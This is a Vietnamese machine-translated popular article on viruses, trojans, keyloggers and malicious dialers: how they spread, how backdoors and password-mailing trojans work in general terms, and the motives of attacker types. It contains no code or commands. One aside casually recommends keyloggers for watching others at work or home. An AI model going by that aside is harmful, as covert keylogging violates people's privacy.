Thực đơn
trang chủiOS

Virus gián điệp, hay điều gì đằng sau cuộc chiến thông tin. Virus gián điệp

Virus, gián điệp, trojan và trình quay số: ai, tại sao và như thế nào

Tôi nghĩ rằng nếu bạn hỏi bất kỳ học sinh nào ngày nay lavsan, anh ấy sẽ không nói cho bạn biết về "một loại sợi tổng hợp được tạo ra bằng quá trình đa ngưng tụ ethylene glycol và diaxit thơm." Không, câu trả lời của anh ấy sẽ như thế này: “Lovesan, hay còn gọi là msblast - thâm nhập vào hệ điều hành của gia đình Microsoft Windows khai thác lỗ hổng trong dịch vụ Microsoft Windows DCOM RPC." Tôi sợ phải đoán sau một thời gian sẽ có liên tưởng gì với từ này sự chết. Rõ ràng không chỉ với trò chơi cùng tên.

Như bạn có thể hiểu từ tiêu đề và phần giới thiệu, cuộc trò chuyện bây giờ sẽ tập trung vào vi-rút và các loại vi-rút tương tự. Trước khi chuyển sang câu trả lời cho các câu hỏi được đặt ra ở tiêu đề của chương, hôm nay tôi xin điểm qua trực tiếp các “vị khách” của chúng ta. Ở đây chúng tôi sẽ trả lời câu hỏi làm thế nào tất cả những thứ này xâm nhập vào máy tính của chúng tôi.

Bản chất của chương trình là nó có một số hậu quả phá hoại. Và không quan trọng chúng là gì: mọi thứ đều có thể xảy ra ở đây - từ sự thay đổi tầm thường về quyền đối với tệp và làm hỏng nội dung bên trong của nó cho đến sự gián đoạn Internet và sự cố của hệ điều hành. Virus còn có nghĩa là một chương trình không chỉ mang chức năng phá hoại mà còn có khả năng sinh sản. Đây là những gì được nói về điều này trong một cuốn sách thông minh: “Đặc tính bắt buộc (cần thiết) của virus máy tính là khả năng tạo ra các bản sao của chính nó (không nhất thiết phải giống với bản gốc) và đưa chúng vào mạng máy tính và/hoặc các tập tin, vùng hệ thống máy tính và các đối tượng thực thi khác. Đồng thời, các bản sao vẫn có khả năng lây lan thêm" (Evgeniy Kaspersky, " Virus máy tính"), Quả thực, để tồn tại, virus cần phải nhân lên và điều này đã được chứng minh bởi khoa học như sinh học. Nhân tiện, chính từ những loại virus sinh học này mà cái tên virus máy tính bắt nguồn từ đó. Và bản thân chúng hoàn toàn biện minh cho cái tên của mình: tất cả các loại vi-rút đều đơn giản và tuy nhiên, bất chấp nỗ lực của các công ty chống vi-rút, những công ty có chi phí được tính toán rất lớn, chúng vẫn tồn tại và phát triển. Bạn không cần phải tìm đâu xa để tìm ví dụ: hãy lấy ví dụ như một loại vi-rút như I-Worm.Mydoom.b. Đã bao nhiêu lần họ nói rằng bạn không nên mở các tập tin đính kèm và tin nhắn email từ những người không quen biết và bạn nên cảnh giác với những tin nhắn từ những người đã biết, đặc biệt nếu bạn chưa đồng ý về điều này. Ngoài ra, nếu nội dung của bức thư có nội dung như sau: “Kiểm tra bức ảnh mát mẻ bạn gái của tôi,” thì nó phải bị xóa ngay lập tức. Nhưng trong khi ở ví dụ trên, văn bản vẫn có ý nghĩa thì nội dung của các email bị nhiễm mydoom’oM lại khá lạ. Hãy tự đánh giá: “Thư không thể được biểu diễn bằng mã hóa ASCII 7 bit và đã được gửi dưới dạng daemon gửi thư đính kèm nhị phân đã báo cáo: Đã xảy ra lỗi #804 trong phiên SMTP. Đã nhận được một phần tin nhắn. Tin nhắn chứa các ký tự Unicode và đã được gửi dưới dạng tệp đính kèm nhị phân. Tin nhắn chứa đồ họa được mã hóa MIME và đã được gửi dưới dạng tệp đính kèm nhị phân. Giao dịch qua thư không thành công. Tin nhắn một phần có sẵn."

Bức thư chứa một tệp có 9 tùy chọn tên tệp đính kèm và 5 tùy chọn phần mở rộng. Hai biến thể đã đến hộp thư đến của tôi. Đầu tiên là một kho lưu trữ zip có tệp tài liệu giả định và thứ hai là một tệp thực thi đơn giản với biểu tượng được thay thế bằng biểu tượng notepad. Nếu trong trường hợp thứ hai, bất kỳ người dùng nào cũng có thể nhận thấy điểm bắt bằng cách nhìn vào độ phân giải, thì trong trường hợp đầu tiên, việc này đã khó thực hiện hơn. Đây là trường hợp đầu tiên mà tôi có xu hướng quy số lượng ca nhiễm trùng lớn nhất. Tôi sẽ không nói cho bạn biết vi-rút này làm gì vì điều này đã được nói nhiều lần trên các ấn phẩm in ấn và tài nguyên trực tuyến. Sử dụng ví dụ về Mudoom, chúng tôi đã làm quen với phương pháp lây lan vi-rút đầu tiên - qua email.

Hãy xem phương pháp tiếp theo sử dụng Worm.Win32.Lovesan (còn được gọi là msblast) làm ví dụ. Điều gì đáng chú ý về loại virus này và tại sao việc lây nhiễm nó lại trở nên phổ biến? Cá nhân này đáng chú ý ở chỗ, về nguyên tắc, nó không ảnh hưởng đến hiệu suất của toàn bộ hệ thống. Một máy tính bị nhiễm nó đơn giản là không thể lướt Internet bình thường. Sau một thời gian, thông báo lỗi RPC hiện lên, sau đó máy tính khởi động lại.

Một cách khác là thông qua Internet, khi bạn tải xuống các tệp (mong muốn hoặc không mong muốn). Một lần nữa, tôi sẽ giải thích bằng các ví dụ. Một ví dụ về những gì mong muốn. Bạn đang tải xuống một cái gì đó từ Internet? trò đùa mới, hoặc một chương trình, hoặc một trò chơi và nó bị nhiễm vi-rút. Sau khi tải xuống, chương trình/trò chơi/trò đùa sẽ bắt đầu và - thì đấy - bạn là chủ sở hữu của vi-rút. Tôi có thể nói gì? Hãy cảnh giác, thường xuyên cập nhật cơ sở dữ liệu chống vi-rút của bạn, quét tất cả các chương trình bằng phần mềm chống vi-rút và đừng quên ít nhất những điều cơ bản bảo mật máy tính. Ai đó có thể nói: "Ví dụ, tại sao tôi phải quét các chương trình không thể bị nhiễm vi-rút?" Tôi muốn hỏi: “Đây là những loại chương trình gì?” Bất kỳ chương trình nào cũng có thể bị lây nhiễm, đặc biệt nếu chúng được tải xuống từ Varezniks hoặc trang web của các nhóm hacker.

Bây giờ chúng ta hãy chuyển sang tải xuống không mong muốn. Tôi sẽ nhấn mạnh hai loại tải như vậy. Đầu tiên là khi người dùng thậm chí không nghi ngờ rằng có thứ gì đó đang được tải xuống máy tính của mình. Đã thực hiện bản tải xuống này thông qua việc thực thi tập lệnh. Loại tải xuống không mong muốn thứ hai là khi tải xuống sai thứ gì đó. Tôi sẽ cho bạn một ví dụ. Có thời điểm, một trang web crack đã đề xuất cài đặt “Thanh XXX miễn phí” hoặc “100% crack Internet” ngay trước khi tải xuống tệp. Nếu người dùng đồng ý với điều này (và tôi chắc chắn là có một số, vì tôi vẫn nhớ câu hỏi của tháng trong “Niềm vui ảo” về “100% bẻ khóa Internet”), thì một Trojan hoặc vi-rút đã được tải xuống. Sự khác biệt về nguyên tắc là nhỏ. Tuy nhiên, đây không phải là điều thú vị nhất: nếu một lời đề nghị hấp dẫn như vậy bị từ chối, một dấu hiệu sẽ bật lên với dòng chữ như sau: “Lỗi trang web” và nút OK hoặc Tiếp tục, khi nhấp vào đó Trojan vẫn được tải xuống , mặc dù người dùng không hề biết. Và tôi chỉ có thể cứu khỏi điều này bức tường lửa (bức tường lửa).

Trojan - là một chương trình cung cấp truy cập trái phépđến máy tính để thực hiện bất kỳ hành động nào tại đích mà không cần cảnh báo chủ sở hữu máy tính hoặc gửi địa chỉ cụ thể thông tin được thu thập. Đồng thời, như một quy luật, cô ấy giả vờ là một thứ gì đó yên bình và cực kỳ hữu ích.

Phần Trojan bị giới hạn gửi mật khẩu của bạn qua thư tới người tạo mật khẩu hoặc người đã định cấu hình chương trình này ( thư điện tử Trojan). Tuy nhiên, đối với người dùng Internet, các chương trình nguy hiểm nhất là những chương trình cho phép bạn lấy được Truy cập từ xa tới xe của họ từ bên cạnh ( Cửa sau ). Rất thường xuyên, Trojan xâm nhập vào máy tính cùng với các chương trình hữu ích hoặc tiện ích phổ biến, giả mạo chúng.

Một đặc điểm của các chương trình này buộc chúng phải được phân loại là có hại là thiếu cảnh báo về việc cài đặt và khởi chạy chúng. Khi được khởi chạy, Trojan sẽ tự cài đặt trên hệ thống và sau đó giám sát hệ thống mà không cung cấp cho người dùng bất kỳ thông báo nào về hành động của nó. Hơn nữa, liên kết đến Trojan có thể không có trong danh sách ứng dụng đang hoạt động hoặc hợp nhất với họ. Kết quả là, người dùng máy tính có thể không biết về sự hiện diện của mình trong hệ thống khi máy tính được mở để điều khiển từ xa.

Khá thường xuyên, thuật ngữ “Trojan” dùng để chỉ một loại virus. Trong thực tế, điều này là xa trường hợp. Không giống như virus, Trojan nhằm mục đích lấy được thông tin bí mật và truy cập vào một số tài nguyên máy tính nhất định.

Có nhiều cách khác nhau để Trojan xâm nhập vào hệ thống của bạn. Điều này thường xảy ra nhất khi bạn khởi chạy bất kỳ chương trình hữu ích nào có nhúng máy chủ Trojan. Tại thời điểm khởi chạy lần đầu tiên, máy chủ sẽ tự sao chép vào một thư mục nào đó, tự đăng ký khởi chạy trong sổ đăng ký hệ thống và ngay cả khi chương trình của nhà cung cấp dịch vụ không bao giờ khởi động lại thì hệ thống của bạn đã bị nhiễm Trojan. Bạn có thể tự lây nhiễm vào máy bằng cách chạy một chương trình bị nhiễm. Điều này thường xảy ra nếu các chương trình không được tải xuống từ máy chủ chính thức, nhưng từ trang cá nhân. Một Trojan cũng có thể được người lạ giới thiệu nếu họ có quyền truy cập vào máy của bạn, chỉ bằng cách khởi chạy nó từ đĩa mềm.

TRÊN khoảnh khắc này Các loại Trojan phổ biến nhất là:

1. Tiện ích quản trị ẩn (từ xa)(BackDoor - từ tiếng Anh “backdoor”), ngựa Trojan thuộc lớp này vốn là những tiện ích khá mạnh mẽ quản trị từ xa các máy tính trên mạng. Về chức năng, chúng gợi nhớ đến nhiều hệ thống quản trị khác nhau được phát triển bởi các nhà sản xuất sản phẩm phần mềm nổi tiếng. Các tiện ích quản trị ẩn hiện đại (BackDoor) khá dễ sử dụng. Chúng thường bao gồm chủ yếu hai phần chính: máy chủ (người thực thi) và máy khách (cơ quan quản lý của máy chủ). Máy chủ - đây là một tập tin thực thi theo một cách nhất địnhđược nhúng vào máy của bạn, được tải vào bộ nhớ cùng lúc với khởi động Windows và thực thi các lệnh nhận được từ máy khách từ xa. Máy chủ được gửi đến nạn nhân và sau đó tất cả công việc được thực hiện thông qua máy khách trên máy tính của hacker, tức là các lệnh được gửi qua máy khách và máy chủ sẽ thực thi chúng. Bề ngoài, sự hiện diện của anh ta không được phát hiện dưới bất kỳ hình thức nào. Sau khi phần máy chủ của Trojan được khởi chạy, một cổng cụ thể sẽ được dành riêng trên máy tính của người dùng, cổng này chịu trách nhiệm liên lạc với Internet.

Sau các bước này, kẻ tấn công khởi chạy phần máy khách của chương trình, kết nối với máy tính này thông qua một cổng trực tuyến mở và có thể thực hiện hầu hết mọi hành động trên máy của bạn (điều này chỉ bị giới hạn bởi khả năng của chương trình được sử dụng). Sau khi kết nối với máy chủ, quản lý máy tính điều khiển từ xa bạn gần như có thể làm như chính mình: khởi động lại, tắt, mở CD-ROM, xóa, ghi, thay đổi tập tin, hiển thị tin nhắn, v.v.

Trên một số Trojan, bạn có thể thay đổi cổng mở trong quá trình hoạt động và thậm chí đặt mật khẩu truy cập cho “master” của Trojan này. Ngoài ra còn có các Trojan cho phép bạn sử dụng máy bị xâm nhập làm máy chủ proxy (giao thức HTTP hoặc Socks) để ẩn địa chỉ IP thực của hacker.

2. Thuộc về bưu điện(thư điện tử Trojan).

Trojan cho phép bạn "lấy" mật khẩu và thông tin khác từ các tệp trên máy tính của bạn và gửi chúng qua email cho chủ sở hữu. Đây có thể là thông tin đăng nhập và mật khẩu Internet của nhà cung cấp, mật khẩu từ hộp thư, Mật khẩu ICQ và IRC, v.v. Để gửi thư cho chủ sở hữu qua thư, Trojan sẽ liên hệ với máy chủ thư của trang web qua Giao thức SMTP(ví dụ: trên smtp.mail.ru). Sau khi thu thập dữ liệu cần thiết, Trojan sẽ kiểm tra xem dữ liệu này đã được gửi chưa. Nếu không, dữ liệu sẽ được gửi và lưu trữ trong sổ đăng ký. Nếu chúng đã được gửi đi thì chữ cái trước đó sẽ được trích xuất khỏi sổ đăng ký và so sánh với chữ cái hiện tại. Nếu có bất kỳ thay đổi nào xảy ra trong thông tin (dữ liệu mới đã xuất hiện), thì thư sẽ được gửi và dữ liệu mật khẩu mới nhất sẽ được ghi vào sổ đăng ký. Nói một cách dễ hiểu, loại Trojan này chỉ đơn giản là thu thập thông tin và nạn nhân thậm chí có thể không nhận ra rằng ai đó đã biết mật khẩu của mình.

3. Bàn phím(Keylogger).

Những Trojan này ghi lại mọi thứ được gõ trên bàn phím (bao gồm cả mật khẩu) vào một tệp, sau đó được gửi đến một e-mail cụ thể hoặc được xem qua FTP (Tệp Giao thức chuyển giao). Keylogger'bi thường chiếm ít không gian và có thể cải trang thành người khác chương trình hữu ích, khiến chúng khó bị phát hiện. Một lý do khác khiến loại Trojan này khó bị phát hiện là vì các tệp của nó được gọi là tệp hệ thống. Một số Trojan thuộc loại này có thể trích xuất và giải mã mật khẩu được tìm thấy trong các trường mật khẩu đặc biệt.

Những chương trình như vậy yêu cầu cấu hình và tạo mặt nạ thủ công. Keylogger'bi có thể được sử dụng không chỉ cho mục đích côn đồ. Ví dụ, sẽ rất thuận tiện khi đặt chúng ở nơi làm việc hoặc ở nhà khi bạn đi vắng.

4. chương trình đùa(Chương trình đùa).

Những chương trình này về bản chất là vô hại. Chúng không gây ra bất kỳ tổn hại trực tiếp nào cho máy tính nhưng chúng hiển thị thông báo cho biết rằng tác hại đó đã xảy ra, có thể xảy ra trong một số điều kiện nhất định hoặc cảnh báo người dùng về mối nguy hiểm không tồn tại. Các chương trình chơi khăm đe dọa người dùng bằng các tin nhắn định dạng ổ cứng, phát hiện vi-rút trong các tệp không bị nhiễm, hiển thị các thông báo lạ giống vi-rút, v.v. - điều này phụ thuộc vào khiếu hài hước của người tạo ra chương trình như vậy. Tất nhiên, không có lý do gì để lo lắng nếu không có người nào khác làm việc trên máy tính này. người dùng thiếu kinh nghiệm, ai có thể rất sợ hãi trước những tin nhắn như vậy.

5. “Trojan horse” cũng có thể bao gồm các tệp bị nhiễm, mã của tệp này đã được sửa đổi theo một cách nhất định hoặc được thay đổi bằng phương pháp mật mã. Ví dụ: tập tin được mã hóa chương trình đặc biệt và/hoặc được đóng gói bởi một nhà lưu trữ không xác định. Kết quả là, ngay cả các phiên bản phần mềm chống vi-rút mới nhất cũng không thể phát hiện sự hiện diện của Trojan trong tệp vì nhà cung cấp mã không có trong cơ sở dữ liệu chống vi-rút của họ.

Các phương pháp thâm nhập của chúng không khác với những phương pháp được mô tả ở trên. Vì vậy, chúng ta hãy ngay lập tức chuyển sang việc xem xét. Ở đây cần phải đặt trước rằng có những trình quay số hoàn toàn yên bình, thường được gọi là “trình quay số”. Các chương trình này được sử dụng để giúp người dùng quay số tiếp cận nhà cung cấp của họ và nếu có thể, duy trì liên lạc với nhà cung cấp đó. kết nối ổn định ngay cả trên các dòng cũ hoặc "hiện đại hóa". Những cái chúng ta sắp nói đến có một cái tên khác - trình quay số chiến đấu. Lợi dụng những lỗ hổng trong hệ điều hành và đôi khi do sự sơ suất hoặc ngây thơ của người dùng (xem phần “100% crack Internet” ở trên), các chương trình này thay thế điện thoại của nhà cung cấp bằng điện thoại của một nhà mạng viễn thông từ một quốc gia xa lạ nào đó. Hơn nữa, trong hầu hết các trường hợp, số điện thoại cũ tốt của nhà cung cấp vẫn còn trong cửa sổ quay số. Trình quay số cũng ghi vào bộ lập lịch tác vụ cần gọi vào một thời điểm nhất định. Và thật tốt nếu người dùng có thói quen tắt modem hoặc có modem ngoài và hét lên để mẹ khỏi lo lắng. Điều gì sẽ xảy ra nếu modem yên tĩnh và được tích hợp sẵn? Đó là những gì tôi đang nói về. Và người đàn ông tội nghiệp chỉ phát hiện ra nỗi đau buồn của mình khi nhận được một hóa đơn điện thoại khổng lồ như vậy.

Đã đến lúc nói về người viết và tung ra tất cả những thứ vớ vẩn này trên Internet. Ở đây tôi sẽ cố gắng phân loại những nhóm người đang tham gia vào công việc kinh doanh không phù hợp này. Sẽ không có cuộc nói chuyện nào ở đây về cái gọi là tin tặc “mũ trắng”. Tôi sẽ giải thích tại sao. Sự đa dạng này không gây nguy hiểm cho xã hội và mang lại lợi ích cho nó. Họ là những người thường xuyên viết virus chống vi-rút nhất để vô hiệu hóa những cá nhân đặc biệt có hại. Tại sao virus? Các chương trình này lây lan bằng cơ chế tương tự như virus. Tại sao lại chống? Vì họ chặn hoặc xóa loại nhất định virus từ máy tính của bạn. Điểm khác biệt chính của chúng so với virus là khả năng tự hủy sau khi hoàn thành nhiệm vụ và không có bất kỳ chức năng phá hoại nào. Một ví dụ là một loại virus tương tự xuất hiện trên Internet một thời gian sau khi Lovesan tái nghiện. Sau khi tải xuống virus chống vi-rút, Lovesan đã bị xóa và người dùng được nhắc tải xuống các bản cập nhật cho Windows. Hacker mũ trắng cũng tìm ra lỗi trong phần mềm và hệ thống máy tínhà, sau đó họ báo cáo những lỗi tìm được cho công ty. Bây giờ hãy chuyển trực tiếp đến phân loại của chúng tôi.

Loại một: “con của tập lệnh”. Họ tự gọi mình là HaCkeR-rr, họ đọc tạp chí Hacker, họ không biết một ngôn ngữ lập trình nào và họ tạo ra tất cả các Trojan và virus “của họ” bằng cách tải xuống các chương trình làm sẵn từ web. (Để tránh thiên vị, tôi sẽ bảo lưu rằng tạp chí Hacker, về nguyên tắc, không tệ và tài liệu trong đó được trình bày dưới dạng khá đơn giản - ở một số chỗ, điều đó đúng. Nhưng ở dạng đơn giản dành cho mọi người những người đã có một số kiến ​​​​thức nhất định và tài liệu là họ cung cấp một cách khôn ngoan - họ không kể mọi thứ đến cùng - để không thu hút họ đi đâu cả, người ta phải nghĩ như vậy.) Những “hacker” này thường sau khi họ gửi cho ai đó một bản tin. Trojan được tải xuống từ đâu đó và phần sau hoạt động, họ ngay lập tức bắt đầu la hét trên các diễn đàn về sự tuyệt vời của chúng, v.v., v.v. Vì vậy, họ ngay lập tức nhận được một loạt các tuyên bố không hay ho dành cho họ, bởi vì đó không phải là vấn đề. Vì bạn đã làm điều ác nên tốt nhất là nên giữ im lặng. Những cá nhân này không gây ra mối nguy hiểm cụ thể nào, vì đơn giản là họ không có đủ kinh nghiệm hoặc (trong một số trường hợp) bộ não để thực hiện một công việc quy mô lớn hơn hoặc ít hơn.

Loại thứ hai: “người mới bắt đầu”. Loài này là hậu duệ trực tiếp của loài đầu tiên. Một số đại diện của loại đầu tiên, sau một thời gian nhất định, bắt đầu hiểu rằng họ không ngầu như họ nghĩ, hóa ra cũng có những ngôn ngữ lập trình, bạn có thể làm gì đó và sau đó không hét lên với cả thế giới về “tôi là một chàng trai tuyệt vời”. Một số người trong số họ trong tương lai có lẽ sẽ trở thành đại diện của tầng lớp chuyên nghiệp. Những người này bắt đầu học một ngôn ngữ, cố gắng viết một cái gì đó và tư duy sáng tạo bắt đầu thức tỉnh trong họ. Đồng thời, chúng bắt đầu gây ra một mối nguy hiểm nhất định cho xã hội, bởi vì ai biết được loại tác phẩm đáng sợ nào mà một đại diện của tầng lớp những người viết virus có thể sáng tác do thiếu kinh nghiệm. Rốt cuộc, khi một chuyên gia viết mã, anh ta vẫn nhận ra rằng một số việc không cần phải làm, bởi vì chúng có thể chống lại anh ta. Người mới bắt đầu không có kiến ​​thức như vậy và điều này khiến anh ta trở nên nguy hiểm.

Loại thứ ba: “chuyên nghiệp”. Họ phát triển từ loại thứ hai. “Ưu điểm” được phân biệt bởi kiến ​​thức sâu sắc về ngôn ngữ lập trình, an ninh mạng, hiểu sâu sắc các hệ điều hành và quan trọng nhất là họ có kiến ​​thức và hiểu biết rất nghiêm túc về cơ chế hoạt động của mạng và hệ thống máy tính. Hơn nữa, các “pro” không chỉ tìm hiểu về những lỗ hổng trong hệ thống bảo mật từ các bản tin của công ty mà còn có thể tự mình tìm ra chúng. Họ thường tham gia cùng nhau trong các nhóm hacker để nâng cao chất lượng “công việc” của mình. Những người này nhìn chung là người kín tiếng và không tham lam danh vọng khi thực hiện bất kỳ công việc gì. hoạt động thành công Họ không chạy đi để nói với cả thế giới về điều đó mà thích ăn mừng thành công của mình một cách hòa bình với bạn bè. Tất nhiên, họ gây ra mối nguy hiểm lớn, nhưng vì họ đều là những người hiểu biết nên họ sẽ không thực hiện những hành động có thể gây ra sự sụp đổ toàn cầu của bất kỳ hệ thống nào - ví dụ như Internet. Mặc dù vẫn có những trường hợp ngoại lệ (không phải ai cũng quên Slammer).

Loại thứ tư: “tin tặc công nghiệp”. Những đại diện nguy hiểm nhất của gia đình hacker đối với xã hội. Họ có thể được gọi một cách chính đáng là tội phạm thực sự. Theo lương tâm của họ, họ viết hầu hết các trình quay số và hack mạng ngân hàng, các công ty lớn và các cơ quan chính phủ. Tại sao và tại sao họ làm điều này, chúng ta sẽ nói dưới đây. “Các nhà công nghiệp” không tính đến bất cứ điều gì hoặc bất cứ ai; những cá nhân này có khả năng làm bất cứ điều gì để đạt được mục tiêu của họ.

Bây giờ hãy tóm tắt những gì đã được viết.

“Những đứa con của chữ viết”: trẻ, non nớt và thiếu kinh nghiệm. Tôi muốn chứng tỏ rằng bạn ngầu hơn những người khác và người ngầu nhất chỉ có Cool Sam.

“Người mới bắt đầu”: Tôi có mong muốn tự mình viết một cái gì đó. May mắn thay, một số người trong số họ sau khi cố gắng nắm vững sự phức tạp của các giao thức Internet và ngôn ngữ lập trình đã từ bỏ và đi làm điều gì đó yên bình hơn.

“Pro”: nếu đột nhiên xảy ra trạng thái “nhận ra tội lỗi, mức độ, mức độ, chiều sâu” của mình, thì người đại diện thuộc loại này sẽ trở thành một chuyên gia bảo mật máy tính có trình độ cao. Tôi ước có nhiều chuyên gia hơn sẽ đạt được điểm này.

“Các nhà công nghiệp”: không có gì thiêng liêng cả. Sự khôn ngoan phổ biến nói tốt về những người như vậy: “Ngôi mộ sẽ sửa chữa gù lưng”.

Đây là sự phân chia sơ bộ thành các loại đại diện của lớp kẻ tấn công máy tính. Bây giờ chúng ta hãy chuyển sang câu hỏi: tại sao họ lại làm điều này?

Nhưng thực sự, tại sao virus, Trojan, trình quay số và các linh hồn ma quỷ khác lại được viết ra? Một trong những lý do là mong muốn khẳng định bản thân. Nó là điển hình cho đại diện của loại thứ nhất và thứ hai. Một người chỉ cần cho bạn bè thấy rằng mình là “một đứa trẻ thực sự, ngầu”, người còn lại - chủ yếu là để nâng cao lòng tự trọng. Lý do thứ hai là để tích lũy kinh nghiệm. Điển hình cho người mới bắt đầu. Sau khi viết kiệt tác đầu tiên của mình, tất nhiên, bạn muốn thử nghiệm nó với ai đó - thực sự không phải với chính bạn. Vì vậy, một số lượng nhất định các loại virus mới, không phải lúc nào cũng rất nguy hiểm, xuất hiện trên Internet.

Lý do tiếp theo là tinh thần cạnh tranh. Bạn đã bao giờ nghe nói về các cuộc thi hacker chưa? Lần cuối cùng tôi biết diễn ra vào mùa hè. Nhóm hacker Brazil đã giành chiến thắng (hóa ra họ không chỉ mạnh về bóng đá). Nhiệm vụ như sau: ai sẽ phá vỡ nhiều trang web nhất. Nhưng tôi chắc chắn rằng có những cuộc cạnh tranh dành cho cả loại virus phức tạp nhất và loại virus tốt nhất. keylogger.

Adrenaline là một lý do khác. Hãy tưởng tượng: màn đêm, đèn màn hình, ngón tay lướt trên bàn phím, ngày hôm qua đã tìm thấy lỗ hổng trong hệ thống bảo mật, hôm nay bạn cần cố gắng giành quyền truy cập vào hệ thống và cho quản trị viên đồng nghiệp của bạn biết ai là ông chủ. Theo dõi cái này lý do là và tiếp theo là sự lãng mạn. Vậy ai thích ngắm hoàng hôn, ai thích ngắm sao, ai thích viết virus. Bao nhiêu người, bao nhiêu sở thích.

Lý do là như sau - phản đối chính trị hoặc xã hội. Vì lý do này, hầu hết các trang web của chính phủ, trang web của đảng chính trị, các ấn phẩm in ấn và trực tuyến, cũng như các tập đoàn lớn đều bị tấn công. Bạn không cần phải tìm đâu xa để tìm ví dụ. Ngay sau khi bắt đầu cuộc chiến ở Iraq, các cuộc tấn công đã được thực hiện trên các trang web của chính phủ Mỹ bởi những người không hài lòng với chính sách của Bush, cũng như trang web của tờ báo Ả Rập Al-Jazeera và một số nguồn tin Ả Rập khác từ phía đối diện.

Và có lẽ lý do cuối cùng- Đây là tiền có mặt khắp nơi. Có thể nói, chủ yếu là vì lợi ích của họ mà các tin tặc công nghiệp hoạt động. Bằng cách xâm nhập vào mạng ngân hàng, họ có quyền truy cập vào tài khoản của khách hàng. Không khó để đoán điều gì sẽ xảy ra tiếp theo. Bằng cách thu thập thông tin về bất kỳ người dùng Internet nào thông qua phần mềm gián điệp, sau đó họ tham gia vào các hoạt động tống tiền tầm thường. Những hành động mà các “nhà công nghiệp” thực hiện có thể liệt kê rất dài, tôi chỉ muốn nói một lần nữa rằng họ chính thức là tội phạm máy tính và họ cần phải bị đối xử như tội phạm.

Từ cuốn sách Tạp chí Computerra số 726 tác giả tạp chí máy tính

Từ cuốn Tạp chí Computerra số 25-26 ngày 12 tháng 7 năm 2005 tác giả tạp chí máy tính

Các điệp viên, hãy tìm hiểu trang bị của bạn! Có vẻ như những thay đổi nghiêm trọng đang bắt đầu trên thế giới. Trong mọi trường hợp, chưa có điều gì như thế này từng xảy ra trước đây. Một tòa án ở Ý đã ban hành lệnh bắt giữ 13 sĩ quan CIA của Mỹ về tội bắt cóc. Và hãy để người đàn ông này, giáo sĩ của nhà thờ Hồi giáo Milan

Từ sách Tạp chí Computerra số 35 ngày 25 tháng 9 năm 2007 tác giả tạp chí máy tính

PHÂN TÍCH: Gián điệp trong Wikipedia Quốc gia Tác giả: Kiwi Bird Cột mốc ấn tượng với hai triệu bài viết mà phân khúc tiếng Anh của Wikipedia đạt được vào tháng 9 năm nay là một thành công to lớn và không thể nghi ngờ của cộng đồng Internet toàn cầu, mà thông qua những nỗ lực tổng hợp của mình, đã cố gắng đạt được tạo nên

Từ cuốn sách Lỗi và lỗi của PC. Chúng tôi tự xử lý máy tính. Hãy bắt đầu! tác giả Tashkov Peter

Chương 4 Virus, Trojan và phần mềm gián điệp Có lẽ sẽ không sai khi nói rằng cùng với máy tính, các chương trình xuất hiện đã cố gắng làm hại nó. Nhiều loại virus, ngựa Trojan, ứng dụng phần mềm gián điệp, sâu và các loài gây hại phần mềm khó chịu khác liên tục tồn tại.

Từ cuốn sách Lỗi và lỗi của PC. Chúng tôi tự xử lý máy tính tác giả Dontsov Dmitry

Chặn ngựa Trojan, sâu và phần mềm gián điệp Ngày xưa, với sự xuất hiện của những loại virus đầu tiên, mối nguy hiểm chính là lây nhiễm vào máy tính và tài liệu văn phòng. Về nguyên tắc, đây không phải là vấn đề lớn vì chương trình chống vi-rút có thể đối phó với

Từ cuốn sách Tạp chí kỹ thuật số "Computerra" số 97 tác giả tạp chí máy tính

Từ cuốn sách Internet - dễ dàng và đơn giản! tác giả Alexandrov Egor

Kiwi's Nest: Spies in Law Kiwi Bird Xuất bản ngày 29 tháng 11 năm 2011 Mùa xuân Ả Rập, làn sóng nổi dậy lan rộng khắp khu vực Trung Đông trong năm nay, có một sản phẩm phụ đáng chú ý. Bản chất của nó là thế

Trích từ sách Computerra PDA N147 (26/11/2011-12/02/2011) tác giả tạp chí máy tính

Virus Virus là một loại virus có hại chương trình máy tính, có khả năng tái tạo, tạo ra các bản sao của chính nó, từ đó cũng giữ được khả năng tái tạo (Hình 10.1). Trong những năm gần đây, do sự phát triển nhanh chóng của công nghệ mạng, việc định nghĩa từ “virus”

Từ cuốn sách Lừa đảo qua Internet. Các phương thức lừa đảo tiền từ xa và cách tránh trở thành nạn nhân của tội phạm mạng tác giả Gladky Alexey Anatolievich

Keef's Nest: Spies in Law Đăng bởi Kiwi Bird Xuất bản ngày 29 tháng 11 năm 2011 Mùa xuân Ả Rập, làn sóng nổi dậy của quần chúng lan khắp Trung Đông trong năm nay, có một sản phẩm phụ đáng chú ý. Bản chất của nó là Tây Âu và

Từ cuốn sách Cuộc trò chuyện miễn phí qua Internet tác giả Fruzorov Sergey

Tại sao keylogger lại nguy hiểm? Keylogger là một chương trình hoặc thiết bị liên tục theo dõi tất cả các lần nhấn phím trên bàn phím (và trong nhiều trường hợp, tất cả các lần nhấp chuột) để thu thập thông tin về tất cả các lần nhấn phím.

Từ cuốn sách Tạo vi-rút và chống vi-rút tác giả Guliev Igor A.

Virus và sâu Một loại virus là chương trình thường xuyên, thực hiện các hành động có hại và đôi khi hết sức phá hoại. Bạn hỏi virus có thể làm gì? Có, hầu hết mọi thứ có thể được thực hiện trong hệ điều hành của bạn. Chúng ta hãy xem xét điều này chi tiết hơn một chút tại

Từ cuốn sách Giới thiệu về Mật mã học tác giả Zimmermann Philip

Keylogger Keylogger là chương trình ghi nhớ những phím nào được nhấn khi bạn vắng mặt, tức là những gì đang xảy ra trên máy tính của bạn khi bạn không ở văn phòng. Để làm điều này, mọi thứ gõ trên bàn phím sẽ được nhập vào

Từ cuốn sách Tạp chí kỹ thuật số "Computerra" số 191 tác giả tạp chí máy tính

Virus và Trojan Cuộc tấn công liên quan đến việc sử dụng virus hoặc sâu máy tính được thiết kế đặc biệt để lây nhiễm chương trình PGP đã cài đặt của bạn. Loại virus giả định này có thể được thiết kế để ngăn chặn khóa riêng và mật khẩu hoặc nội dung

Từ cuốn sách Tạp chí kỹ thuật số "Computerra" số 197 tác giả tạp chí máy tính

Trojan phần cứng cho bộ xử lý Intel - lần đầu tiên triển khai thực tế Andrey Vasilkov Xuất bản ngày 19 tháng 9 năm 2013 Tám năm trước, Bộ Quốc phòng Hoa Kỳ đã công khai bày tỏ lo ngại rằng, nếu có đủ trình độ kỹ thuật

Từ cuốn sách Tạp chí kỹ thuật số "Computerra" số 204 tác giả tạp chí máy tính

